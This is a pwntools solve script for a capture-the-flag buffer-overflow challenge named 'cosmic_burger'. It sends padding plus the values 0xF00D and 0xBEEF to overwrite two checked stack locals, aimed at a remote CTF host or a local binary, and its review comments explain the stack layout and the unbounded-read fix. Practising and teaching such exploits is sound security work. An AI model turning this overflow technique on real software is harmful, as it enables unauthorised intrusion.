OffSec-CTF/BOF/06_cosmic_burger_joint/solve.py

#!/usr/bin/env python3
from pwn import *
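# Load the challenge binary so pwntools takes its architecture and endianness
# from the ELF when packing values; checksec output is suppressed.
context.binary = elf = ELF("./cosmic_burger", checksec=False)

# Open exactly one tube. Previously a local process was started and `p` was
# then immediately rebound to the remote connection, which left the local child
# running with no handle to close it. Remote remains the default target; pass
# LOCAL on the command line (pwntools `args`) to run against the local binary.
if args.LOCAL:
    p = process(elf.path)
else:
    p = remote("offsec.m0lecon.it", 13529)

# Number of filler bytes written before the two checked locals are reached.
# NOTE(review): 40 bytes ending at rbp-0x8 implies the input buffer starts at
# rbp-0x30 -- confirm against the disassembly of vuln().
OFFSET = 40

# Comparisons performed in vuln(), copied from the disassembly:
#   mov eax,DWORD PTR [rbp-0x4]
#   cmp eax,0xbeef
#   jne 0x12f2 <vuln+196>
#   mov eax,DWORD PTR [rbp-0x8]
#   cmp eax,0xf00d
first = 0xBEEF   # value compared against [rbp-0x4]
second = 0xF00D  # value compared against [rbp-0x8]

# The input is laid out toward higher addresses, so the 32-bit value for
# rbp-0x8 comes before the one for rbp-0x4. Nothing past rbp is written.
payload = flat(
    b"A" * OFFSET,
    p32(second),
    p32(first),
)

# NOTE(review): what this demonstrates is corruption of adjacent stack locals,
# not of the saved return address, so a check that only guards the return
# address would not flag it. The underlying defect is presumably an input read
# that is not bounded to the buffer size; bounding that read in the target is
# the fix.
p.send(payload)
p.interactive()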